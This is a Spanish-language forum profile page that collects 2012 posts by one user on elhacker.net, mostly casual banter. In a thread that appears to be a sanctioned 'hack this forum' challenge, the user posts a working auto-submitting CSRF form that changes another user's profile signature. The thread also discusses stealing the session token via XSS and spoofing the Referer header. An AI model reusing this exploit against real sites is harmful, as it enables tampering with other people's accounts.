Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - m0rf

#721
Cita de: WHK en 13 Febrero 2012, 20:21 PM
O sea que si le tiramos una bomba a foxcon nos quedamos sin xbox, play station, iphone, notebooks, kindles, vaios, etc?

Vaya!, si tuviera dinero me abriría una empresa que fabrique consolas y celulares y le enviaría una bomba a foxcon y competencia ganada! :D

Muy sutil tu plan  :rolleyes:
#722
Sugerencias y dudas sobre el Foro / Re: EHN
11 Febrero 2012, 20:15 PM
Respecto a las i's sorry pero soy catalan y cuando escribo rapido se me escapan.

Espero no causar mucho dolor de ojos a nadie xD.

Solo postee porque como dijiste lo primero, pense que tenias una segunda cosa que decir ajjaajja nada más.

I con respecto a la comunidad, si es una gran comunidad y puede ser mejor si aportas tu granito de arena. No conozco una playa tan larga como elhacker.net en todo el litoral marítimo de habla hispana.

Saludos y suerte.
#723
Hacking / Re: [Ayuda] Troyano en Pc congelado
11 Febrero 2012, 16:00 PM
Cita de: xKuziS13x en 11 Febrero 2012, 12:42 PM
Hola a todos, soy nuevo en este foro, quiero infectar a un Pc que esta congelado y mi pregunta es: ¿Se puede infectar sin  que tenga que descongelar el PC o hay que descongelarlo? Respondanme rapido pls

Respuesta corta: Si.

Respuesta larga: Si, pero...
#724
Sugerencias y dudas sobre el Foro / Re: EHN
11 Febrero 2012, 15:59 PM
Cita de: Alejandro_tgn en  9 Febrero 2012, 23:30 PM
Hola, soy nuevo por acá, y bueno, primero de todo quisiera felicitarles a todos  ;-) por la fantástica página, o más bien comunidad que han credo. Me parece un lugar muy completo en el que encuentras cosas que ni te imaginabas que existieran, o simplemente ni si quiera habías oído hablar, en el que cada vez que entro aprendo algo nuevo.

I lo segundo?
#725
Nivel Web / Re: Hackea a elhacker.net v2.0
11 Febrero 2012, 11:11 AM
Pero con xss lo puedes enviar desde la misma elhacker.net y no daria error de referencia no?

Bueno mi idea era solo obtener el sc con el xss para usarlo en el form, pero si necesita referer puedes hacer un script en la url que es vulnerable para insertar el form desde alli no?

I si no, no lo he probado nunca, pero no puedes hacer una petición falsa con el referer falsificado? Repito que no lo he probado ni se si puede hacerse.
#727
Nivel Web / Re: Hackea a elhacker.net v2.0
9 Febrero 2012, 17:17 PM
Cita de: ~ Yoya ~ en  9 Febrero 2012, 14:45 PM
xD

Jejej xD.
Lee de nuevo mi comentario, lo edite... Lo consigo de otra forma.

Aunque ya encontré un CSRF, que seria para cerrar sesion jajaja xD



Yo el formulario que he hecho es este:


<html>
<head>
<title>Hacking elhacker.net</title>
</head>

<body>

<form action="http://foro.elhacker.net/profile2.html" method="post" accept-charset="ISO-8859-1" name="creator" id="creator" enctype="multipart/form-data">

<input type="hidden" name="signature" value="añlskdfñqwiejfñalksjndvpiqouwenfhñqwjkef">

<input type="hidden" name="sa" value="forumProfile">

<input type="hidden" name="sc" value="tu cookie"/>

<input type="hidden" name="userID" value="334657"/>

<script type="text/javascript">document.creator.submit();</script>

</form>

</body>

</html>


Si le pongo mi sc y el id del user la firma cambia.

Lo ejecuto desde el pc mismo desconozco si colgado en algun hosting funcionara pero diria mucho que si ya que si funciona abriendolo local.

Seguramente me paso algo por alto ~ Yoya ~ pero en las pruebas que realice funcionaba.
#728
Nivel Web / Re: Hackea a elhacker.net v2.0
9 Febrero 2012, 14:37 PM
Cita de: ~ Yoya ~ en  9 Febrero 2012, 14:21 PM
Ya he podido capturar el ID del token (sc).. Ahora hay otro filtro, que es el sitio de referencia xD, ya que el exploit que enviá el formulario se ejecuta en un sitio remoto xD.

Saludos.

Yo con el formulario que cree con mi sc podia cambiar mi firma. Ese otro filtro no lo he encontrado. Lo consigues con xss o de otra forma el sc?

#729
Can you put it on pastebin?
#730
Nivel Web / Re: Hackea a elhacker.net v2.0
8 Febrero 2012, 01:42 AM
Cita de: Abakus en  8 Febrero 2012, 01:01 AM
Has contado con el token de seguridad "SC"?

El xss es para conseguirlo no?

Porque la url para cambiar el perfil es facil crearla en otro server pero necesitas el sc como dices.

Almenos lo que yo he probado.